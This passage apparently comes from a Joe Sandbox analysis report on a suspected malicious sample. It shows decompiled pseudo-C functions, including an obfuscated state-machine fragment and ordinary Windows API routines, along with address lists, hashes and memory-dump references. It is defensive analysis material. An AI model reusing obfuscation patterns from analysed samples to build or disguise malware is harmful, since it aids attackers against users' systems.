								_t11 = 0x2793b377;
								_v576 = 1;
							}
							continue;
						} else {
							if(_t11 != 0x388705c7) {
								goto L18;
							} else {
								_t11 = 0x124353fe;
								continue;
							}
						}
					}
					goto L37;
				}
			}

0x022387d0
0x022387da
0x022387dc
0x022387e1
0x022387e5
0x022387e9
0x022387ed
0x022387f1
0x022387f1
0x022387f6
0x00000000
0x00000000
0x022387fc
0x022387fc
0x02238908
0x0223890d
0x00000000
0x02238802
0x02238802
0x02238807
0x022388e6
0x022389d2
0x022389d9
0x022389ec
0x022389f1
0x022389f1
0x022389f7
0x022389f9
0x02238a05
0x00000000
0x00000000
0x00000000
0x0223880d
0x0223880d
0x0223887c
0x02238881
0x02238887
0x0223888b
0x022388a3
0x022388a5
0x022388a5
0x022388ab
0x022388c7
0x022388c9
0x022388ce
0x022388d3
0x022388d7
0x00000000
0x0223880f
0x02238814
0x02238855
0x0223885f
0x02238861
0x02238864
0x0223886a
0x0223886d
0x00000000
0x02238816
0x0223881b
0x02238821
0x02238828
0x0223883b
0x02238840
0x02238840
0x02238846
0x02238848
0x02238848
0x0223884d
0x022387f1
0x022387f1
0x022387f1
0x022387f6
0x00000000
0x00000000
0x00000000
0x022387f6
0x00000000
0x022387f1
0x02238903
0x02238903
0x0223881b
0x02238814
0x0223880d
0x02238807
0x00000000
0x02238917
0x0223891c
0x02238993
0x0223899a
0x022389ad
0x022389b2
0x022389b2
0x022389c2
0x022389c6
0x00000000
0x022389c8
0x022389c8
0x00000000
0x022389c8
0x0223891e
0x02238923
0x02238936
0x0223893d
0x02238950
0x02238955
0x02238955
0x02238976
0x0223897a
0x00000000
0x02238980
0x02238980
0x02238985
0x0223898a
0x0223898a
0x00000000
0x02238925
0x0223892a
0x00000000
0x0223892c
0x0223892c
0x00000000
0x0223892c
0x0223892a
0x02238923
0x00000000
0x0223891c

Strings

6g4, xrefs: 0223891E
Ei, xrefs: 0223888D
6g4, xrefs: 022389C8

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: 6g4$6g4$Ei
API String ID: 0-2833161213
Opcode ID: 8652a83b0379ac1b904f20e24f1f4ce34d71dd1e9070da3033e61226c5f17d32
Instruction ID: c4b86ae8aa1f98fa50d381268b6a5f7bf2bcea88b5597b36b228cee2ff94791e
Opcode Fuzzy Hash: 8652a83b0379ac1b904f20e24f1f4ce34d71dd1e9070da3033e61226c5f17d32
Instruction Fuzzy Hash: AE5126E9B2030697D626EAE99848B7B3396EBC4704F540929F905DF34CEB64DC0587E3

Uniqueness

Uniqueness Score: -1.00%

Function 004145CA, Relevance: 3.4, APIs: 2, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 46%

			E004145CA(intOrPtr* __ecx) {
				signed int _t137;
				signed int _t140;
				signed int _t141;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				intOrPtr _t150;
				signed int _t151;
				signed int* _t152;
				signed char _t155;
				unsigned int _t159;
				unsigned int _t167;
				void* _t168;
				signed int _t172;
				signed int* _t176;
				unsigned int _t178;
				intOrPtr* _t179;
				unsigned int _t180;
				intOrPtr* _t181;
				signed int _t186;
				unsigned int _t191;
				unsigned int _t203;
				void* _t205;

				_t182 = __ecx;
				E00406520(E00429E60, _t205);
				 *(_t205 - 0x10) =  *(_t205 - 0x10) & 0x00000000;
				_t172 =  *(_t205 + 8);
				_t200 = __ecx;
				if(_t172 != 0x111) {
					if(_t172 != 0x4e) {
						_t203 =  *(_t205 + 0x10);
						if(_t172 == 6) {
							E004134A8(_t182, _t200,  *((intOrPtr*)(_t205 + 0xc)), E00413740(_t205, _t203));
						}
						if(_t172 != 0x20 || E00413509(_t200, _t203, _t203 >> 0x10) == 0) {
							_t137 =  *((intOrPtr*)( *_t200 + 0x28))();
							 *(_t205 - 0x14) = _t137;
							E00425F56(7);
							_t186 =  *(_t205 + 8);
							_t140 = (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) + (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) * 2;
							_t176 = 0x437ce0 + _t140 * 4;
							_t141 =  *(_t205 - 0x14);
							if(_t186 !=  *(0x437ce0 + _t140 * 4) || _t141 != _t176[2]) {
								 *_t176 = _t186;
								_t176[2] = _t141;
								if(_t141 == 0) {
									L29:
									_t176[1] = _t176[1] & 0x00000000;
									E00425FC6(7);
									goto L30;
								}
								L20:
								while(1) {
									if(_t186 >= 0xc000) {
										_t145 = E00414546( *((intOrPtr*)(_t141 + 4)), 0xc000, 0, 0);
										 *(_t205 + 0x10) = _t145;
										if(_t145 == 0) {
											L28:
											_t147 =  *( *(_t205 - 0x14));
											 *(_t205 - 0x14) = _t147;
											if(_t147 != 0) {
												_t141 =  *(_t205 - 0x14);
												_t186 =  *(_t205 + 8);
												continue;
											}
											goto L29;
										}
										while( *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x10)))) !=  *(_t205 + 8)) {
											_t159 = E00414546(_t145 + 0x18, 0xc000, 0, 0);
											 *(_t205 + 0x10) = _t159;
											if(_t159 != 0) {
												_t145 =  *(_t205 + 0x10);
												continue;
											}
											goto L28;
										}
										_t176[1] = _t145;
										E00425FC6(7);
										_t180 =  *(_t205 + 0x10);
										goto L96;
									}
									_t148 = E00414546( *((intOrPtr*)(_t141 + 4)), _t186, 0, 0);
									 *(_t205 + 0x10) = _t148;
									if(_t148 != 0) {
										_t176[1] = _t148;
										E00425FC6(7);
										_t178 =  *(_t205 + 0x10);
										goto L33;
									}
									goto L28;
								}
							} else {
								_t178 = _t176[1];
								 *(_t205 + 0x10) = _t178;
								E00425FC6(7);
								if(_t178 == 0) {
									L30:
									goto L31;
								}
								if( *(_t205 + 8) < 0xc000) {
									L33:
									_t191 =  *(_t205 + 0x10);
									_t179 =  *((intOrPtr*)(_t178 + 0x14));
									_t150 =  *((intOrPtr*)(_t191 + 0x10));
									if( *((intOrPtr*)(_t191 + 8)) == 0x1a) {
										_t155 = GetVersion();
										asm("sbb eax, eax");
										_t150 = (_t155 & 0x000000f0) + 0x2f;
									}
									_t151 = _t150 - 1;
									if(_t151 > 0x30) {
										goto L100;
									} else {
										switch( *((intOrPtr*)(_t151 * 4 +  &M00414A78))) {
											case 0:
												_push( *((intOrPtr*)(_t205 + 0xc)));
												_push(E00419BA2());
												goto L52;
											case 1:
												_push( *(__ebp + 0xc));
												goto L52;
											case 2:
												_push(__esi >> 0x10);
												__eax = __si;
												_push(__si);
												__eax = E00413740(__ebp,  *(__ebp + 0xc));
												goto L55;
											case 3:
												__ecx = __ebp - 0x24;
												E00419B00(__ebp - 0x24) =  *(__esi + 4);
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x60;
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = E0041331F(__ebp - 0x60);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												_push(__eax);
												 *(__ebp - 4) = 1;
												 *(__ebp - 0x44) = __eax;
												__eax = E00413767();
												if(__eax == 0) {
													__eax =  *(__edi + 0x34);
													if(__eax != 0) {
														__ecx = __eax + 0x20;
														__eax = E00411824(__eax + 0x20,  *(__ebp - 0x44));
														if(__eax != 0) {
															 *(__ebp - 0x28) = __eax;
														}
													}
													__eax = __ebp - 0x60;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x24;
												__ecx = __edi;
												_push(__ebp - 0x24);
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 0x44) =  *(__ebp - 0x44) & 0x00000000;
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x60;
												 *(__ebp - 0x10) = __ebp - 0x24;
												__eax = E00413DB2(__ebp - 0x60);
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												__ecx = __ebp - 0x24;
												goto L48;
											case 4:
												__ecx = __ebp - 0x24;
												E00419B00(__ebp - 0x24) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												 *(__ebp - 4) = 2;
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												 *(__ebp - 0x10) = __ebp - 0x24;
												__ecx = __ebp - 0x24;
												L48:
												__eax = E00419C1F(__ecx);
												goto L100;
											case 5:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E00413740(__ebp, __esi);
												goto L54;
											case 6:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L83;
											case 7:
												_push(__esi);
												L52:
												_t154 =  *_t179();
												goto L99;
											case 8:
												L97:
												_push(_t203);
												_push( *((intOrPtr*)(_t205 + 0xc)));
												goto L98;
											case 9:
												_push(__esi);
												_push(E00417635());
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L54:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L55:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L99;
											case 0xa:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
											case 0xb:
												_push( *(__ebp + 0xc));
												goto L86;
											case 0xc:
												_push(__esi);
												goto L80;
											case 0xd:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L59;
											case 0xe:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L90;
											case 0xf:
												_push(E00413740(__ebp,  *(__ebp + 0xc)));
												_push(E00413740(__ebp, __esi));
												__eax = 0;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x1c)) == __esi;
												goto L62;
											case 0x10:
												_push( *(__ebp + 0xc));
												__eax = E00419BA2();
												goto L64;
											case 0x11:
												_push( *(__ebp + 0xc));
												__eax = E00417635();
												goto L64;
											case 0x12:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												_push( *(__ebp + 0xc));
												__eax = E00417635();
												goto L62;
											case 0x13:
												_push( *(__ebp + 0xc));
												goto L69;
											case 0x14:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L72;
											case 0x15:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L72:
												_push(__eax);
												__eax = E00413740(__ebp,  *(__ebp + 0xc));
												goto L62;
											case 0x16:
												_push(__esi);
												__eax = E00413740(__ebp,  *(__ebp + 0xc));
												L59:
												_push(__eax);
												goto L81;
											case 0x17:
												_push(E00413740(__ebp, __esi));
												L80:
												_push( *(__ebp + 0xc));
												goto L81;
											case 0x18:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E00413740(__ebp, __esi);
												goto L88;
											case 0x19:
												__eax =  *(__ebp + 0xc);
												__edx = __ax;
												__eax =  *(__ebp + 0xc) >> 0x10;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												__eax = __ax;
												 *(__ebp + 0xc) = __eax;
												if( *((intOrPtr*)(__ecx + 0x10)) != 0x1d) {
													_push(__eax);
													_push(__edx);
													L81:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L100;
												}
												_push(E00413740(__ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L91;
											case 0x1a:
												_push(__esi);
												goto L86;
											case 0x1b:
												_push(__esi);
												__ecx = __edi;
												_push( *(__ebp + 0xc));
												__eax =  *__ebx();
												goto L93;
											case 0x1c:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												goto L83;
											case 0x1d:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L99;
											case 0x1e:
												goto L100;
											case 0x1f:
												_push(__esi);
												L69:
												__eax = E00413740(__ebp);
												L64:
												_push(__eax);
												L86:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
											case 0x20:
												_push(__esi);
												__eax = E00413740(__ebp,  *(__ebp + 0xc));
												L83:
												_push(__eax);
												L98:
												_t154 =  *_t181();
												L99:
												 *(_t205 - 0x10) = _t154;
												goto L100;
											case 0x21:
												__eax = __si & 0x0000ffff;
												_push(__esi);
												_push(__si & 0x0000ffff);
												__eax =  *(__ebp + 0xc);
												__ecx = __edi;
												__eax =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												if(_t168 != 0) {
													goto L100;
												}
												goto L30;
											case 0x22:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L88:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L62:
												_push(__eax);
												goto L91;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L90:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L91:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
										}
									}
								}
								L96:
								_t181 =  *((intOrPtr*)(_t180 + 0x14));
								goto L97;
							}
						} else {
							L93:
							 *(_t205 - 0x10) = 1;
							L100:
							_t152 =  *(_t205 + 0x14);
							if(_t152 != 0) {
								 *_t152 =  *(_t205 - 0x10);
							}
							_push(1);
							_pop(0);
							L31:
							 *[fs:0x0] =  *((intOrPtr*)(_t205 - 0xc));
							return 0;
						}
					}
					_t167 =  *(_t205 + 0x10);
					if( *_t167 == 0) {
						goto L30;
					}
					_push(_t205 - 0x10);
					_push(_t167);
					_push( *((intOrPtr*)(_t205 + 0xc)));
					_t168 =  *((intOrPtr*)( *__ecx + 0x7c))();
					goto L6;
				}
				_push( *(_t205 + 0x10));
				_push( *((intOrPtr*)(_t205 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0x78))() == 0) {
					goto L30;
				}
				goto L93;
			}

0x004145ca
0x004145cf
0x004145d7
0x004145dc
0x004145e7
0x004145e9
0x00414606
0x00414630
0x00414636
0x00414643
0x00414643
0x0041464b
0x00414669
0x0041466f
0x00414681
0x00414686
0x00414689
0x00414693
0x0041469a
0x0041469d
0x004146cd
0x004146cf
0x004146d2
0x00414748
0x00414748
0x0041474e
0x00000000
0x0041474e
0x00000000
0x004146dc
0x004146e3
0x00414704
0x0041470b
0x0041470e
0x0041473c
0x0041473f
0x00414743
0x00414746
0x004146d6
0x004146d9
0x00000000
0x004146d9
0x00000000
0x00414746
0x00414715
0x00414730
0x00414737
0x0041473a
0x00414712
0x00000000
0x00414712
0x00000000
0x0041473a
0x00414a4b
0x00414a4e
0x00414a53
0x00000000
0x00414a53
0x004146ed
0x004146f4
0x004146f7
0x00414768
0x0041476b
0x00414770
0x00000000
0x00414770
0x00000000
0x004146f9
0x004146a4
0x004146a4
0x004146a9
0x004146ac
0x004146b3
0x00414753
0x00000000
0x00414753
0x004146c0
0x00414773
0x00414773
0x00414776
0x0041477d
0x00414780
0x00414782
0x0041478d
0x00414791
0x00414791
0x00414794
0x00414798
0x00000000
0x0041479e
0x0041479e
0x00000000
0x004147a5
0x004147ad
0x00000000
0x00000000
0x004147b3
0x00000000
0x00000000
0x004147c0
0x004147c1
0x004147c4
0x004147c8
0x00000000
0x00000000
0x004147e0
0x004147e8
0x004147eb
0x004147ef
0x004147f2
0x004147f5
0x004147fa
0x004147fc
0x004147ff
0x00414800
0x00414804
0x00414807
0x0041480e
0x00414810
0x00414815
0x0041481a
0x0041481d
0x00414824
0x00414826
0x00414826
0x00414824
0x00414829
0x00414829
0x0041482c
0x0041482d
0x0041482e
0x00414831
0x00414833
0x00414834
0x00414836
0x0041483a
0x0041483e
0x00414842
0x00414845
0x00414848
0x0041484d
0x00414851
0x00000000
0x00000000
0x00414856
0x0041485e
0x00414861
0x00414864
0x00414867
0x0041486a
0x0041486b
0x0041486d
0x00414874
0x00414876
0x0041487a
0x0041487e
0x00414881
0x00414884
0x00414884
0x00000000
0x00000000
0x00414891
0x00414894
0x00414896
0x00000000
0x00000000
0x004148a0
0x004148a3
0x004148a4
0x00000000
0x00000000
0x004148ad
0x004148ae
0x004148b0
0x00000000
0x00000000
0x00414a59
0x00414a59
0x00414a5a
0x00000000
0x00000000
0x004148b7
0x004148bd
0x004148be
0x004148c1
0x004148c4
0x004148c4
0x004148c5
0x004148c9
0x004148c9
0x004148ca
0x004148cc
0x00000000
0x00000000
0x004148d3
0x004148d5
0x00000000
0x00000000
0x004148dc
0x00000000
0x00000000
0x004149cc
0x00000000
0x00000000
0x004148e6
0x004148e9
0x004148ec
0x004148ed
0x00000000
0x00000000
0x004148fb
0x004148fc
0x00000000
0x00000000
0x0041490c
0x00414913
0x00414914
0x00414919
0x00000000
0x00000000
0x00414922
0x00414925
0x00000000
0x00000000
0x00414930
0x00414933
0x00000000
0x00000000
0x0041493f
0x00414940
0x00414943
0x00414944
0x00414947
0x00000000
0x00000000
0x0041494e
0x00000000
0x00000000
0x00414960
0x00414961
0x00000000
0x00000000
0x00414966
0x00414969
0x0041496c
0x0041496f
0x00414970
0x00414970
0x00414974
0x00000000
0x00000000
0x0041497b
0x0041497f
0x004148f0
0x004148f0
0x00000000
0x00000000
0x0041498f
0x004149cd
0x004149cd
0x00000000
0x00000000
0x00414995
0x00414998
0x0041499a
0x00000000
0x00000000
0x004149a1
0x004149a4
0x004149a7
0x004149ae
0x004149b1
0x004149b4
0x004149b7
0x004149c8
0x004149c9
0x004149d0
0x004149d0
0x004149d2
0x00000000
0x004149d2
0x004149bf
0x004149c0
0x004149c3
0x00000000
0x00000000
0x004149ec
0x00000000
0x00000000
0x00414a18
0x00414a19
0x00414a1b
0x00414a1e
0x00000000
0x00000000
0x004149d9
0x004149dc
0x004149df
0x004149e2
0x00000000
0x00000000
0x004149e6
0x004149e8
0x00000000
0x00000000
0x00000000
0x00000000
0x00414953
0x00414954
0x00414954
0x0041492a
0x0041492a
0x004149ed
0x004149ed
0x004149ef
0x00000000
0x00000000
0x004147d2
0x004147d6
0x004149e3
0x004149e3
0x00414a5d
0x00414a5f
0x00414a61
0x00414a61
0x00000000
0x00000000
0x00414a29
0x00414a2f
0x00414a30
0x00414a31
0x00414a34
0x00414a36
0x00414a39
0x00414a3a
0x00414a3e
0x00414a3f
0x00414a41
0x00414623
0x00414625
0x00000000
0x00000000
0x00000000
0x00000000
0x004149f3
0x004149f6
0x004149f7
0x004149fa
0x004149fa
0x004149fb
0x0041491c
0x0041491c
0x00000000
0x00000000
0x00414a04
0x00414a07
0x00414a0a
0x00414a0d
0x00414a0e
0x00414a0e
0x00414a0f
0x00414a12
0x00414a12
0x00414a14
0x00000000
0x00000000
0x0041479e
0x00414798
0x00414a56
0x00414a56
0x00000000
0x00414a56
0x00414a20
0x00414a20
0x00414a20
0x00414a64
0x00414a64
0x00414a69
0x00414a6e
0x00414a6e
0x00414a70
0x00414a72
0x00414755
0x0041475b
0x00414763
0x00414763
0x0041464b
0x00414608
0x0041460e
0x00000000
0x00000000
0x00414619
0x0041461a
0x0041461b
0x00414620
0x00000000
0x00414620
0x004145eb
0x004145f0
0x004145f8
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004145CF
GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 00414782

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prologVersion
String ID:
API String ID: 1836448879-0
Opcode ID: 6804e743f549afb56d718e3d7c3f63743442d0cf40abdee9c0b7a5798ec63ac2
Instruction ID: 6d1c88816f6b00128a0c6823e596581e0366b3c43c7f26b1fcf2de6b97230d22
Opcode Fuzzy Hash: 6804e743f549afb56d718e3d7c3f63743442d0cf40abdee9c0b7a5798ec63ac2
Instruction Fuzzy Hash: 1EE19FB0600215ABDB10DF65CC80AFF77A9AF84715F10811AF8199B291D73CEE82DB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004182CC, Relevance: 3.1, APIs: 2, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004182CC(CHAR* _a4, intOrPtr* _a8) {
				struct _WIN32_FIND_DATAA _v324;
				void* __ebp;
				signed char _t21;
				void* _t23;
				intOrPtr _t36;
				void* _t37;
				signed int _t43;
				intOrPtr* _t45;

				_t45 = _a8;
				_push(_a4);
				_t43 = _t45 + 0x12;
				_push(_t43);
				_t21 = E00417B29();
				if(_t21 != 0) {
					_t23 = FindFirstFileA(_a4,  &_v324);
					_t44 = _t43 | 0xffffffff;
					if(_t23 != (_t43 | 0xffffffff)) {
						FindClose(_t23);
						 *(_t45 + 0x10) = _v324.dwFileAttributes & 0x0000007f;
						 *((intOrPtr*)(_t45 + 0xc)) = _v324.nFileSizeLow;
						 *_t45 =  *((intOrPtr*)(E00410A21( &_a4,  &(_v324.ftCreationTime), _t44)));
						 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(E00410A21( &_a4,  &(_v324.ftLastAccessTime), _t44)));
						_t36 =  *((intOrPtr*)(E00410A21( &_a4,  &(_v324.ftLastWriteTime), _t44)));
						 *((intOrPtr*)(_t45 + 4)) = _t36;
						if( *_t45 == 0) {
							 *_t45 = _t36;
						}
						if( *((intOrPtr*)(_t45 + 8)) == 0) {
							 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(_t45 + 4));
						}
						_t37 = 1;
						return _t37;
					}
					L3:
					return 0;
				}
				 *_t43 =  *_t43 & _t21;
				goto L3;
			}

0x004182d6
0x004182da
0x004182dd
0x004182e0
0x004182e1
0x004182e8
0x004182f8
0x004182fe
0x00418303
0x0041830a
0x0041831c
0x00418325
0x00418337
0x0041834b
0x0041835d
0x0041835f
0x00418365
0x00418367
0x00418367
0x0041836d
0x00418372
0x00418372
0x00418377
0x00000000
0x00418377
0x00418305
0x00000000
0x00418305
0x004182ea
0x00000000

APIs

Part of subcall function 00417B29: __EH_prolog.LIBCMT ref: 00417B2E
Part of subcall function 00417B29: GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 00417B4C
Part of subcall function 00417B29: lstrcpynA.KERNEL32(?,?,00000104), ref: 00417B5B

FindFirstFileA.KERNEL32(?,?,?,?), ref: 004182F8
FindClose.KERNEL32(00000000), ref: 0041830A

Part of subcall function 00410A21: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00410A31
Part of subcall function 00410A21: FileTimeToSystemTime.KERNEL32(?,?), ref: 00410A43

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: FileTime$Find$CloseFirstFullH_prologLocalNamePathSystemlstrcpyn
String ID:
API String ID: 1806329094-0
Opcode ID: b7f339ff05c08edb12b5b07986eaf3c3076bcc97df6ff015d563050ec9bdd282
Instruction ID: 6e730e5e3aabd3498d018952e94f1575065a8e7aa0a625f1e4e67d3b2b6d1fdd
Opcode Fuzzy Hash: b7f339ff05c08edb12b5b07986eaf3c3076bcc97df6ff015d563050ec9bdd282
Instruction Fuzzy Hash: FB219F32500209AFCB21DF61C840ADAB7F8EF29310F10496EE996D7250E774AAC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004238DC, Relevance: 3.0, APIs: 2, Instructions: 40
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004238DC(void* __ecx, signed int _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t14;
				signed char _t17;
				void* _t22;

				_t22 = __ecx;
				_t17 = E00416528(__ecx);
				if((_t17 & 0x80000000) == 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t17 & 0x00000001) == 0)) {
					L6:
					return E004213D8(_t22, _a4, _a8);
				}
				_t14 = E0041538C(_t17, _t22, _a4, _a8);
				if(_t14 == 0) {
					goto L6;
				}
				return _t14;
			}

0x004238e2
0x004238e9
0x004238f1
0x00423930
0x00000000
0x00423938
0x00423927
0x0042392e
0x00000000
0x00000000
0x00423941

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetKeyState.USER32(00000073), ref: 0042390A
GetKeyState.USER32(00000012), ref: 00423913

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: State$LongWindow
String ID:
API String ID: 3716621309-0
Opcode ID: bb65e0fa9b7d0a7c0d825d9f292ebe4aecda4ee8138cf08f0cea5d2dfc1c7898
Instruction ID: 3c56875740f518b2a97b9670c9fd2796869f586b3b5a21460ff62eda90a64155
Opcode Fuzzy Hash: bb65e0fa9b7d0a7c0d825d9f292ebe4aecda4ee8138cf08f0cea5d2dfc1c7898
Instruction Fuzzy Hash: 1CF0FCB134022D76DF202956EC00BEA6B65CF517D5F80403BFD045B361CABDDE919258

Uniqueness

Uniqueness Score: -1.00%

Function 0042252B, Relevance: 3.0, APIs: 2, Instructions: 32
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042252B(void* __ecx, intOrPtr _a4) {
				void* _t4;
				void* _t13;
				intOrPtr _t14;

				_t14 = _a4;
				_t13 = __ecx;
				if(_t14 == 0xffffffff) {
					if(IsWindowVisible( *(__ecx + 0x1c)) != 0) {
						if(IsIconic( *(_t13 + 0x1c)) != 0) {
							_push(9);
							goto L5;
						}
					} else {
						_push(1);
						L5:
						_pop(_t14);
					}
				}
				_t4 = E0042257B(_t13, _t14);
				if(_t14 != 0xffffffff) {
					E0041668C(_t13, _t14);
					return E0042257B(_t13, _t14);
				}
				return _t4;
			}

0x0042252c
0x00422534
0x00422536
0x00422543
0x00422554
0x00422556
0x00000000
0x00422556
0x00422545
0x00422545
0x00422558
0x00422558
0x00422558
0x00422543
0x0042255c
0x00422564
0x00422569
0x00000000
0x00422571
0x00422578

APIs

IsWindowVisible.USER32(?), ref: 0042253B
IsIconic.USER32 ref: 0042254C

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: IconicVisibleWindow
String ID:
API String ID: 1797901696-0
Opcode ID: 3114faafbd09346105cd640fda3e95f07a6d839efd71b6390e56681c449daa18
Instruction ID: eccaba1ee9c055abd401265b19fa06f210334a3ac8d9ba70b154ff4e3b37beae
Opcode Fuzzy Hash: 3114faafbd09346105cd640fda3e95f07a6d839efd71b6390e56681c449daa18
Instruction Fuzzy Hash: A9F0A03174053236CA303E2D7D24ABF6A5A6B81364B95822BF520A22E0CBD88CD352DD

Uniqueness

Uniqueness Score: -1.00%

Function 02233F20, Relevance: 2.6, Strings: 2, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02233F20(intOrPtr __ecx) {
